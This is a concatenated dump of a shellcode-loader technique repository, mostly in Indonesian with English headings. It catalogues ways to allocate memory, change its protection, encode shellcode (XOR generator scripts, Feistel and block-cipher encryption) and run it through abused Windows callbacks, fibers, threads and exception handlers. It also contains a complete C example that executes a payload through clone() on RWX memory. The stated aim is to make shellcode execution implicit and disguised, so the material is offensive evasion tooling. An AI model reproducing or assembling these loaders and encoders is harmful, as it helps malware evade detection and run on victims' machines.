HANDLE FindDebugInfoFileEx (PCSTR FileName, PCSTR SymbolPath, PSTR DebugFilePath, PFIND_DEBUG_FILE_CALLBACK Callback, PVOID CallerData);
```

### Reference

- [MSDN FindDebugInfoFileEx](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-finddebuginfofileex)
--------------------------------------------------------------------------------
/windows/writing/custom/xor-singlekey/c++/generate.py:
--------------------------------------------------------------------------------
# read shellcode from `shellcode.bin` and
# generate the encoded shellcode

import random

with open("shellcode.bin", "rb") as f:
    shcode = f.read()

# generate a single non-zero byte key (a key of 0 would leave the shellcode unchanged)
key = random.randrange(1, 256)

# xor-encrypt; the key is stored as the first byte so the loader can recover it
enc_shcode = [key] + [ c ^ key for c in shcode ]

# print as C-array
print("{ ", end='')
print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
print(" }")
--------------------------------------------------------------------------------
/windows/allocation/AllocADsMem/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocation with `AllocADsMem`. The memory comes from a heap and is not executable, so a `permission` step is required before the shellcode can run.

```c++
LPVOID AllocADsMem (DWORD cb);

BOOL FreeADsMem (LPVOID pMem);
```

### Reference

- [MSDN AllocADsMem](https://docs.microsoft.com/en-us/windows/win32/api/adshlp/nf-adshlp-allocadsmem)
- [MSDN FreeADsMem](https://docs.microsoft.com/en-us/windows/win32/api/adshlp/nf-adshlp-freeadsmem)
--------------------------------------------------------------------------------
/windows/execution/callback/CertEnumSystemStoreLocation/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode through `CertEnumSystemStoreLocation`.

```c++
BOOL CertEnumSystemStoreLocation (DWORD dwFlags, void *pvArg, PFN_CERT_ENUM_SYSTEM_STORE_LOCATION pfnEnum);
```

### Reference

- [MSDN CertEnumSystemStoreLocation](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certenumsystemstorelocation)
--------------------------------------------------------------------------------
/windows/execution/callback/ImageGetDigestStream/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode through `ImageGetDigestStream`.

```c++
BOOL IMAGEAPI ImageGetDigestStream (HANDLE FileHandle, DWORD DigestLevel, DIGEST_FUNCTION DigestFunction, DIGEST_HANDLE DigestHandle);
```

### Reference

- [MSDN ImageGetDigestStream](https://docs.microsoft.com/en-us/windows/win32/api/imagehlp/nf-imagehlp-imagegetdigeststream)
--------------------------------------------------------------------------------
/windows/execution/callback/FindExecutableImageEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode through `FindExecutableImageEx`.
```c++
HANDLE FindExecutableImageEx (PCSTR FileName, PCSTR SymbolPath, PSTR ImageFilePath, PFIND_EXE_FILE_CALLBACK Callback, PVOID CallerData);
```

### Reference

- [MSDN FindExecutableImageEx](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-findexecutableimageex)
--------------------------------------------------------------------------------
/windows/execution/thread/TrySubmitThreadpoolCallback/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode on a thread-pool thread.

### Overview

Executing shellcode through `TrySubmitThreadpoolCallback`. The callback is queued to the process thread pool and runs on one of its worker threads, not on the calling thread.

```c++
BOOL TrySubmitThreadpoolCallback(PTP_SIMPLE_CALLBACK pfns, PVOID pv, PTP_CALLBACK_ENVIRON pcbe);
```

### Reference

- [MSDN TrySubmitThreadpoolCallback](https://learn.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-trysubmitthreadpoolcallback)
--------------------------------------------------------------------------------
/windows/execution/callback/CryptEnumOIDFunction/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode through `CryptEnumOIDFunction`.
```c++
BOOL CryptEnumOIDFunction (DWORD dwEncodingType, LPCSTR pszFuncName, LPCSTR pszOID, DWORD dwFlags, void *pvArg, PFN_CRYPT_ENUM_OID_FUNC pfnEnumOIDFunc);
```

### Reference

- [MSDN CryptEnumOIDFunction](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptenumoidfunction)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumCalendarInfoExEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode through `EnumCalendarInfoExEx`.

```c++
BOOL EnumCalendarInfoExEx (CALINFO_ENUMPROCEXEX pCalInfoEnumProcExEx, LPCWSTR lpLocaleName, CALID Calendar, LPCWSTR lpReserved, CALTYPE CalType, LPARAM lParam);
```

### Reference

- [MSDN EnumCalendarInfoExEx](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumcalendarinfoexex)
--------------------------------------------------------------------------------
/linux/execution/thread/clone/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode as a thread.

### Overview

Executing shellcode with the `clone` syscall. `clone` is the primitive used both to create a new process (by `fork`) and to create a new thread (by `pthread_create`); the `flags` argument decides what the child shares with its parent, and `CLONE_VM` is what makes the child run in the same address space.
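The `clone` path described above, as an added example that is not the repository's own code. It assumes Linux with glibc on x86-64 or AArch64. The child is created with `CLONE_VM | SIGCHLD`: it shares the parent's address space (so the executable mapping the parent prepared is visible to it) but is a separate task that the parent can collect with `waitpid`, which is how the payload's return value gets back to the parent. The payload is a constructed stub that returns 42, standing in for shellcode.

```c
/* Added example (not the repository's code): run a payload on a child task
 * created with clone(2). The child's exit status carries the payload's return
 * value back to the parent. */
#define _GNU_SOURCE
#include <sched.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/wait.h>

/* glibc declares clone() only under _GNU_SOURCE; the prototype is repeated
 * here so the file builds even if a system header was included first. */
int clone(int (*fn)(void *), void *stack, int flags, void *arg, ...);

#ifndef MAP_STACK
#define MAP_STACK 0          /* hint flag only; harmless if absent */
#endif

/* Constructed stub: "mov eax, 42 ; ret" / "mov w0, #42 ; ret". */
#if defined(__x86_64__) || defined(__i386__)
static const uint8_t STUB[] = { 0xb8, 0x2a, 0x00, 0x00, 0x00, 0xc3 };
#elif defined(__aarch64__)
static const uint8_t STUB[] = { 0x40, 0x05, 0x80, 0x52, 0xc0, 0x03, 0x5f, 0xd6 };
#else
#error "stub bytes are only provided for x86 and AArch64"
#endif

/* clone(2) wants int fn(void *). Wrapping the payload here, instead of handing
 * its address to clone directly, lets its result become the exit status. */
static int child_entry(void *arg)
{
    int (*payload)(void) = (int (*)(void))arg;
    return payload();                  /* return value -> child's exit status */
}

#define STACK_SIZE (64 * 1024)

/* Returns the payload's return value as reported by waitpid, or -1 on error. */
int run_via_clone(const uint8_t *code, size_t len)
{
    void *exec = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (exec == MAP_FAILED) return -1;
    memcpy(exec, code, len);
    __builtin___clear_cache((char *)exec, (char *)exec + len);  /* needed on AArch64 */

    /* The child needs its own stack. clone takes the TOP of the stack, because
     * the stack grows downward on x86 and ARM. */
    void *stack = mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE,
                       MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0);
    if (stack == MAP_FAILED) { munmap(exec, len); return -1; }

    pid_t pid = clone(child_entry, (char *)stack + STACK_SIZE, CLONE_VM | SIGCHLD, exec);

    int result = -1, status;
    if (pid > 0 && waitpid(pid, &status, 0) == pid && WIFEXITED(status))
        result = WEXITSTATUS(status);

    munmap(stack, STACK_SIZE);
    munmap(exec, len);
    return result;
}

int main(void)
{
    printf("payload returned %d\n", run_via_clone(STUB, sizeof STUB));
    return 0;
}
```

Because the flags do not include `CLONE_THREAD`, the child is a separate thread group with its own PID and shows up as a distinct process in `ps`, even though it runs inside the parent's address space; adding `CLONE_THREAD` (together with `CLONE_SIGHAND` and `CLONE_FS`/`CLONE_FILES`) would make it a thread in the `pthread_create` sense, but then `waitpid` can no longer be used to collect it.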
```c++
#define _GNU_SOURCE
#include <sched.h>

int clone(int (*fn)(void *), void *stack, int flags, void *arg, ...);
```

`stack` must point to the top (highest address) of the child's stack, since the stack grows downward on x86 and ARM.

### Reference

- [Man 2 clone](https://man7.org/linux/man-pages/man2/clone.2.html)
--------------------------------------------------------------------------------
/windows/execution/thread/SHCreateThreadWithHandle/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode as a thread.

### Overview

Executing shellcode through `SHCreateThreadWithHandle`. It behaves like `SHCreateThread` but additionally returns a handle to the new thread through `pHandle`, which the loader can wait on.

```c++
BOOL SHCreateThreadWithHandle (LPTHREAD_START_ROUTINE pfnThreadProc, void * pData, SHCT_FLAGS flags, LPTHREAD_START_ROUTINE pfnCallback, HANDLE * pHandle);
```

### Reference

- [MSDN SHCreateThreadWithHandle](https://docs.microsoft.com/en-us/windows/win32/api/shlwapi/nf-shlwapi-shcreatethreadwithhandle)
--------------------------------------------------------------------------------
/windows/writing/encryption/block/lea/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Shellcode encryption.

### Overview

`LEA` encryption with an in-house implementation, without third-party APIs.

### References

- [Reversing.ID LEA Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/LEA)
- [Reversing.ID LEA Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/LEA/code.c)
- [Wikipedia LEA](https://en.wikipedia.org/wiki/LEA_(cipher))
--------------------------------------------------------------------------------
/windows/allocation/CoTaskMemAlloc/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.
4 | 5 | ### Overview 6 | 7 | Alokasi menggunakan `CoTaskMemAlloc`. 8 | 9 | ```c++ 10 | LPVOID CoTaskMemAlloc (SIZE_T cb); 11 | 12 | void CoTaskMemFree (LPVOID pv); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN CoTaskMemAlloc](https://docs.microsoft.com/en-us/windows/win32/api/combaseapi/nf-combaseapi-cotaskmemalloc) 18 | - [MSDN CoTaskMemFree](https://docs.microsoft.com/en-us/windows/win32/api/combaseapi/nf-combaseapi-cotaskmemfree) -------------------------------------------------------------------------------- /windows/execution/callback/VerifierEnumerateResource/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `VerifierEnumerateResource`. 8 | 9 | ```c++ 10 | ULONG VerifierEnumerateResource (HANDLE Process, ULONG Flags, ULONG ResourceType, AVRF_RESOURCE_ENUMERATE_CALLBACK ResourceCallback, PVOID EnumerationContext); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN VerifierEnumerateResource](https://docs.microsoft.com/en-us/windows/win32/api/avrfsdk/nf-avrfsdk-verifierenumerateresource) -------------------------------------------------------------------------------- /windows/writing/custom/xor-multikey/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Transform the shellcode with custom algorithm. 4 | 5 | ### Overview 6 | 7 | Shellcode dienkripsi menggunakan XOR sederhana. Shellcode akan dibagi menjadi beberapa N blok berisi maksimal S-byte. Setiap blok akan didahului dengan sebuah key yang digunakan untuk mengenkripsi blok tersebut. 8 | 9 | Shellcode yang tersimpan memiliki format sebagai berikut: 10 | 11 | ``` 12 | [N] [S] [[Key-1] [Encoded Shellcode-1]] [[Key-2] [Encoded Shellcode-2]] ... [[Key-N] [Encoded Shellcode-N]]. 
13 | ``` -------------------------------------------------------------------------------- /windows/writing/encryption/block/khazad/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryptoin. 4 | 5 | ### Overview 6 | 7 | Enkripsi `KHAZAD` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | ### References 10 | 11 | - [Reversing.ID KHAZAD Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/KHAZAD) 12 | - [Reversing.ID KHAZAD Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/KHAZAD/code.c) 13 | - [Wikipedia KHAZAD](https://en.wikipedia.org/wiki/KHAZAD) -------------------------------------------------------------------------------- /windows/writing/encryption/block/treyfer/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryptoin. 4 | 5 | ### Overview 6 | 7 | Enkripsi `Treyfer` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | ### References 10 | 11 | - [Reversing.ID Treyfer Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Treyfer) 12 | - [Reversing.ID Treyfer Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/Treyfer/code.c) 13 | - [Wikipedia Treyfer](https://en.wikipedia.org/wiki/Treyfer) -------------------------------------------------------------------------------- /windows/writing/encryption/block/3-way/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryption. 4 | 5 | ### Overview 6 | 7 | Enkripsi `3-Way` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 
8 | 9 | `3-Way` merupakan block cipher yang bekerja berdasarkan kalkulasi 3 integer 32-bit sehingga ukuran block dan panjang key dibatasi pada 96-bit. 10 | 11 | ### References 12 | 13 | - [Reversing.ID 3-Way Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/3-Way/code.c) 14 | - [Wikipedia 3-Way](https://en.wikipedia.org/wiki/3-Way) -------------------------------------------------------------------------------- /windows/writing/encryption/block/khufu/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryptoin. 4 | 5 | ### Overview 6 | 7 | Enkripsi `Khufu` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | ### References 10 | 11 | - [Reversing.ID Khufu Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Khufu) 12 | - [Reversing.ID Khusu Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/Khufu/code.c) 13 | - [Wikipedia Khufu (and Khafre)](https://en.wikipedia.org/wiki/Khufu_and_Khafre) -------------------------------------------------------------------------------- /windows/writing/encryption/block/lucifer/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryptoin. 4 | 5 | ### Overview 6 | 7 | Enkripsi `Lucifer` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 
8 | 9 | ### References 10 | 11 | - [Reversing.ID Lucifer Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Lucifer) 12 | - [Reversing.ID Lucifer Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/Lucifer/code.c) 13 | - [Wikipedia Lucifer](https://en.wikipedia.org/wiki/Lucifer_(cipher)) -------------------------------------------------------------------------------- /windows/execution/callback/waveInOpen/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `waveInOpen`. 8 | 9 | ```c++ 10 | MMRESULT waveInOpen(LPHWAVEIN phwi, UINT uDeviceID, LPCWAVEFORMATEX pwfx, DWORD_PTR dwCallback, DWORD_PTR dwInstance, DWORD fdwOpen); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN waveInOpen](https://learn.microsoft.com/en-us/windows/win32/api/mmeapi/nf-mmeapi-waveinopen) 16 | - [MSDN structure WAVEFORMATEX](https://learn.microsoft.com/en-us/previous-versions/dd757713(v=vs.85)) -------------------------------------------------------------------------------- /windows/execution/callback/waveOutOpen/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `waveOutOpen`. 
8 | 9 | ```c++ 10 | MMRESULT waveOutOpen(LPHWAVEOUT phwo, UINT uDeviceID, LPCWAVEFORMATEX pwfx, DWORD_PTR dwCallback, DWORD_PTR dwInstance, DWORD fdwOpen); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN waveOutOpen](https://learn.microsoft.com/en-us/windows/win32/api/mmeapi/nf-mmeapi-waveoutopen) 16 | - [MSDN structure WAVEFORMATEX](https://learn.microsoft.com/en-us/previous-versions/dd757713(v=vs.85)) -------------------------------------------------------------------------------- /windows/execution/callback/NotifyTeredoPortChange/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `NotifyTeredoPortChange`. 8 | 9 | ```c++ 10 | IPHLPAPI_DLL_LINKAGE _NETIOAPI_SUCCESS_ NETIOAPI_API 11 | NotifyTeredoPortChange ( PTEREDO_PORT_CHANGE_CALLBACK Callback, PVOID CallerContext, BOOLEAN InitialNotification, HANDLE *NotificationHandle); 12 | ``` 13 | 14 | ### Reference 15 | 16 | - [MSDN NotifyTeredoPortChange](https://docs.microsoft.com/en-us/windows/win32/api/netioapi/nf-netioapi-notifyteredoportchange) -------------------------------------------------------------------------------- /windows/writing/encryption/block/des/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryptoin. 4 | 5 | ### Overview 6 | 7 | Enkripsi `DES (Data Encryptoin Standard)` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 
8 | 9 | ### References 10 | 11 | - [Reversing.ID DES Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/DES) 12 | - [Reversing.ID DES Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/DES/code.c) 13 | - [Wikipedia DES](https://en.wikipedia.org/wiki/Data_Encryption_Standard) 14 | -------------------------------------------------------------------------------- /windows/execution/callback/NotifyRouteChange2/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `NotifyRouteChange2`. 8 | 9 | ```c++ 10 | IPHLPAPI_DLL_LINKAGE _NETIOAPI_SUCCESS_ NETIOAPI_API 11 | NotifyRouteChange2 (ADDRESS_FAMILY AddressFamily, PIPFORWARD_CHANGE_CALLBACK Callback, PVOID CallerContext, BOOLEAN InitialNotification, HANDLE NotificationHandle); 12 | ``` 13 | 14 | ### Reference 15 | 16 | - [MSDN NotifyRouteChange2](https://docs.microsoft.com/en-us/windows/win32/api/netioapi/nf-netioapi-notifyroutechange2) -------------------------------------------------------------------------------- /windows/writing/custom/xor-chain/c++/generate.py: -------------------------------------------------------------------------------- 1 | # read shellcode from `shellcode.bin` and 2 | # generate the encoded shellcode 3 | 4 | import random 5 | 6 | with open("shellcode.bin", "rb") as f: 7 | shcode = f.read() 8 | shlen = len(shcode) 9 | 10 | key = random.randrange(1, 255) 11 | 12 | # encode shellcode 13 | enc_shcode = [key] 14 | 15 | idx = 0 16 | while idx < shlen: 17 | enc_shcode.append(shcode[idx] ^ enc_shcode[idx]) 18 | idx += 1 19 | 20 | # print as C-array 21 | print("{ ", end='') 22 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='') 23 | print(" }") -------------------------------------------------------------------------------- 
/windows/allocation/GlobalAlloc-GPTR/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Allocate memory for executing shellcode later. 4 | 5 | ### Overview 6 | 7 | Alokasi menggunakan `GlobalAlloc` dan dapatkan pointer ke area yang telah dialokasikan. 8 | 9 | ```c++ 10 | HGLOBAL GlobalAlloc (UINT uFlags, SIZE_T dwBytes); 11 | 12 | HGLOBAL GlobalFree (HGLOBAL hMem); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN GlobalAlloc](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globalalloc) 18 | - [MSDN GlobalFree](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globalfree) -------------------------------------------------------------------------------- /windows/writing/copy/NtWriteVirtualMemory/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Writing shellcode to allocated memory. 4 | 5 | ### Overview 6 | 7 | Penyalinan shellcode menggunakan `NtWriteVirtualMemory`. 8 | 9 | ```c++ 10 | NTSTATUS NtWriteVirtualMemory (HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [NTInternals NtWriteVirtualMemory](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtWriteVirtualMemory.html) -------------------------------------------------------------------------------- /windows/writing/custom/feistel/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Transform the shellcode with custom algorithm. 4 | 5 | ### Overview 6 | 7 | Menggunakan prinsip `Feistel Network` untuk mengenkripsi shellcode. Sebuah key disimpan sebagai byte pertama dan digunakan berulang untuk setiap operasi pada Feistel. 
8 | 9 | Shellcode yang tersimpan memiliki format `[Key] [Encoded Shellcode]`. 10 | 11 | Penerapan Feistel Network dilakukan terhadap setiap pasang byte. Ambil 2 byte yakni L dan R. Pada setiap Feistel, lakukan perhitungan: 12 | 13 | ``` 14 | L[i + 1] = R[i] 15 | R[i + 1] = L[i] xor Key 16 | ``` -------------------------------------------------------------------------------- /windows/execution/callback/PrintDlg/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `PrintDlg`. 8 | 9 | ```c++ 10 | BOOL PrintDlg (LPPRINTDLG lppd); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN PrintDlg](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms646940(v=vs.85)) 16 | - [MSDN structure PRINTDLGA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-printdlga) 17 | - [MSDN structure PRINTDLGW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-printdlgW) -------------------------------------------------------------------------------- /windows/permission/NtProtectVirtualMemory/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Change the memory protection of virtual address space. 4 | 5 | ### Overview 6 | 7 | Ubah permission dengan `NtProtectVirtualMemory`. 
8 | 9 | ```c++ 10 | NTSTATUS NtProtectVirtualMemory (HANDLE ProcessHandle, PVOID * BaseAddress, PULONG NumberOfBytesToProtect, ULONG NewAccessProtection, PULONG OldAccessProtection); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [NTInternals NtProtectVirtualMemory](http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/Memory%20Management/Virtual%20Memory/NtProtectVirtualMemory.html) 16 | -------------------------------------------------------------------------------- /windows/writing/conversion/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | ### Overview 4 | 5 | Melakukan penyalahgunaan windows API untuk menyalin shellcode. 6 | 7 | Fungsi yang termasuk ke dalam kategori ini adalah fungsi yang melakukan konversi dari satu format ke format lain (misal, UTF-8 ke UNICODE). Umumnya fungsi memiliki argumen berupa input dan output buffer. 8 | 9 | Shellcode yang akan diproses oleh fungsi-fungsi ini haruslah disimpan dalam format yang telah ditentukan. Dengan demikian, setiap fungsi mungkin memerlukan generator untuk mengubah (konversi) shellcode menjadi bentuk yang dapat diterima sebagai input fungsi. -------------------------------------------------------------------------------- /linux/execution/callback/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | ### Overview 4 | 5 | Melakukan penyalahgunaan POSIX API, standard library, framework, dsb untuk mengeksekusi shellcode sebagai callback. 6 | 7 | Fungsi yang dapat disalahgunakan pada POSIX lebih sedikit daripada Windows API. 8 | 9 | Sebagian API menerima callback yang akan dijalankan untuk menangani objek atau memproses hasil operasi. Dengan menjalankan shellcode sebagai callback, kode menjadi lebih tersamarkan karena pemanggilan shellcode menjadi implisit. 10 | 11 | Umumnya callback akan berjalan pada thread yang sama dengan thread yang memanggil fungsi. 
-------------------------------------------------------------------------------- /windows/writing/encryption/block/clefia/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryption 4 | 5 | ### Overview 6 | 7 | Enkripsi `CLEFIA` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | `CLEFIA` memiliki beberapa opsi ukuran key, namun dalam contoh implementasi akan digunakan ukuran key 128-bit. 10 | 11 | ### References 12 | 13 | - [Reversing.ID CLEFIA Reference](https://github.com/ReversingID/Crypto-Reference/blob/master/References/Modern/Block-Cipher/CLEFIA) 14 | - [Reversing.ID CLEFIA Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/CLEFIA/code.c) -------------------------------------------------------------------------------- /windows/writing/encryption/block/mars/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryption 4 | 5 | ### Overview 6 | 7 | Enkripsi `MARS` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | `MARS` memiliki beberapa opsi ukuran key, namun dalam contoh implementasi akan digunakan ukuran key 128-bit. 10 | 11 | ### References 12 | 13 | - [Reversing.ID MARS Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/MARS/code.c) 14 | - [Reversing.ID MARS Reference](https://github.com/ReversingID/Crypto-Reference/blob/master/References/Modern/Block-Cipher/MARS) 15 | 16 | -------------------------------------------------------------------------------- /windows/execution/exception/SetUnhandledExceptionFilter/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing exception to run the shellcode. 
4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode melalui exception yang telah didaftarkan melalui `SetUnhandledExceptionFilter` dan dipicu dengan sembarang exception. 8 | 9 | ```c++ 10 | LPTOP_LEVEL_EXCEPTION_FILTER SetUnhandledExceptionFilter (LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN SetUnhandledExceptionFilter](https://docs.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-setunhandledexceptionfilter) -------------------------------------------------------------------------------- /windows/execution/fiber/CreateFiber/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode as a fiber. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CreateFiber`. 8 | 9 | ```c++ 10 | LPVOID CreateFiber(SIZE_T dwStackSize, LPFIBER_START_ROUTINE lpStartAddress, LPVOID lpParameter); 11 | 12 | LPVOID ConvertThreadToFiber(LPVOID lpParameter); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN CreateFiber](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createfiber) 18 | - [MSDN ConvertThreadToFiber](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-convertthreadtofiber) -------------------------------------------------------------------------------- /windows/execution/callback/ChooseFont/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `ChooseFont`. 
8 | 9 | ```c++ 10 | BOOL ChooseFont (LPCHOOSEFONT lpcf); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN ChooseFont](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms646914(v=vs.85)) 16 | - [MSDN structure CHOOSEFONTA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-choosefonta) 17 | - [MSDN structure CHOOSEFONTW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-choosefontW) -------------------------------------------------------------------------------- /linux/execution/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | ### Overview 4 | 5 | Tahap `execution` adalah tahap menjalankan shellcode, baik secara langsung maupun tak langsung. 6 | 7 | Teknik eksekusi dapat dibagi menjadi beberapa kategori berdasarkan karakteristik eksekusi: 8 | 9 | - callback: menyalahgunakan API untuk memanggil shellcode sebagai callback. 10 | - event: memanfaatkan trigger event 11 | - exception: menyalahgunakan sistem exception handling. 12 | - fiber: eksekusi shellcode sebagai fiber baru 13 | - [invoke](invoke): eksekusi shellcode secara langsung tanpa API. 14 | - thread: eksekusi shellcode sebagai thread baru 15 | -------------------------------------------------------------------------------- /linux/execution/callback/ftw/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `ftw` (glibc). 8 | 9 | Fungsi `ftw` adalah fungsi POSIX yang digunakan untuk menelusuri file yang ada pada sebuah direktori. Callback akan dipanggil untuk setiap file yang ditemukan. 
